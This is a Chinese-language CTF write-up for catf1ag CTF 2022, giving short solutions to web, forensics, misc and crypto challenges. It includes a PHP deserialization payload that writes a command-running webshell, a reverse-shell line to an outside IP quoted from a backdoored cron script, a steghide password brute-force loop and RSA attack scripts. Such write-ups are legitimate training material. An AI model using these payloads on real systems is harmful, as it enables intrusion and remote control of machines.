catf1ag ctf 2022 两小时ak wp
中午12:50到14:40差一道ak。。。。。。。。
WEB - 签到了!!!你会玩2048么?
WEB - easy_unser
O:7:"catf1ag":2:{s:6:"target";s:29:"<?php system("cat /flag"); ?>";}
PWN/ATTACK - 查杀
catf1ag{异常IP - shell文件名 - php后门文件的连接密码 - 新增的可疑用户名}
先看定时的shell文件
cat /etc/cr*
* * * * * /bin/bash /var/cache/apt/archives/partial/she11.sh
看到如下文件之后cat一下
bash -i >& /dev/tcp/1.15.155.181/6666 0>&1
php后门在/var/www/html/9里面找一下就可以
用户名直接cat /etc/passwd就可以看到hacker_v的用户
最后flag为catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}
MISC - 签签
hexeditor打开发现最后是base64,解密就行
Y2F0ZjFhZyU3QmNjMDIwNjFlLWM4OGQtMTFlYy1iZWRiLTJjZjA1ZDk1NTQ1NSU3RA==
catf1ag{cc02061e-c88d-11ec-bedb-2cf05d955455}
MISC - 奇怪的字符
打开之后是这么一样东西bcwb4g`slyLMb?ftR~qh,记得之前有次比赛就有类似的东西,试了一下异或之后发现失败了,就那试一下异或变异
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m', end='')
z1r0 = open('secret.txt','r').read()
j = 1
for i in z1r0:
li(chr(ord(i) ^ j))
j += 1
MISC - 这4什么好看的
4应该就是和密码有关的
下载之后是一张图片,lsb各种各样的隐写都试了一下,最后试了一下steghide隐写发现成功了。
#!/bin/bash
ip_start=1
ip_end=9999
for((i=$ip_start; i < $ip_end; i++));
do
steghide extract -sf z1r0.jpeg -p $i
done
catf1ag{198591b0-cbb0-11ec-bae7-2cf05d955455}
CRYPTO - 怎么会多一个呢
rsa的老套路了。。。t利用yafu分解n然后直接拿之前的脚本用一下就可以了
import libnum
import gmpy2
n=73551482761993440116378276402850976017673970117685879384712768054097267028974244867004238587658366463106703581107613883463180833706377915593443986550610497954246664378469651
e=65537
c=19088340804936031145050310701046663800140062626102387290922890724239533128878474005542684734507475562997222905703018409354867816494925059525377106444000231776165581716296665
p = 4254843227
q = 2492374307
r = 6935768738605665705725288400892432256194550668863095515013942769049162888322407038880737120756913240675144540329112141837524407303580284917764285456453059
f = (p-1) * (q-1) * (r-1)
d = gmpy2.invert(e, f)
m = pow(c, d, n)
print(libnum.n2s(int(m)))
CRYPTO - 高实在是高
n=12665183429254325580945372911206360706257079006954643947743121664454914089524916634832685040737214233687785325112424576039016165508146660290974828802710996880849185068704144690143915135774197938764858051298755021664568772363301699454954045374224914126975984844824184263131757665633324767483926757913457691303836308728657455890530401047029807132954324528617558308552469993676230342998368641468028935159530808062712526662606628371783359397956992056631816818089093174030024770769185589578769480295675152580623898653766068001693142399972844934629828827684074705324777912603273764730083438485014417283937379823019721736119
e=3
c=757846665709612710047622798901607696475966191486157677993807167873384365513676489731461790205050172225086169489914035089956311182880536480621453222154862896612205436092262339764782754486059223792491004753337631375452744373859969281558865685434771438386779285599911963081936786091339632323042550461240292308997539607661877861
high_m=911717829801678618100911351591485103708233783320853921932061644898078088242070960582223500287266227352502272
high_m都给我们了那肯定就是m高位攻击。
本地没有这个环境,所以笔者直接在在线网站上运行了脚本。不会m高位攻击?上网随便拿个脚本就好了。
import binascii
def hexStr_to_str(hex_str):
hex = hex_str.encode('utf-8')
str_bin = binascii.unhexlify(hex)
return str_bin.decode('utf-8')
def phase2(high_m, n, c):
R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
m = high_m + x
M = m((m^3 - c).small_roots()[0])
print(hexStr_to_str(hex(int(M))[2:]))
n=12665183429254325580945372911206360706257079006954643947743121664454914089524916634832685040737214233687785325112424576039016165508146660290974828802710996880849185068704144690143915135774197938764858051298755021664568772363301699454954045374224914126975984844824184263131757665633324767483926757913457691303836308728657455890530401047029807132954324528617558308552469993676230342998368641468028935159530808062712526662606628371783359397956992056631816818089093174030024770769185589578769480295675152580623898653766068001693142399972844934629828827684074705324777912603273764730083438485014417283937379823019721736119
e=3
c=757846665709612710047622798901607696475966191486157677993807167873384365513676489731461790205050172225086169489914035089956311182880536480621453222154862896612205436092262339764782754486059223792491004753337631375452744373859969281558865685434771438386779285599911963081936786091339632323042550461240292308997539607661877861
high_m=911717829801678618100911351591485103708233783320853921932061644898078088242070960582223500287266227352502272
phase2(high_m, n, c)
CRYPTO - 栓q
16进制解密只有前一部分。
vim打开的时候会发现<200c>这些东西,Unicode Steganography with Zero-Width Characters,用这个解密即可。
catf1ag{f4ef7dd6-cda1-11ec-860b-2cf05d955455}
WEB - 你猜猜是什么注入?
时间到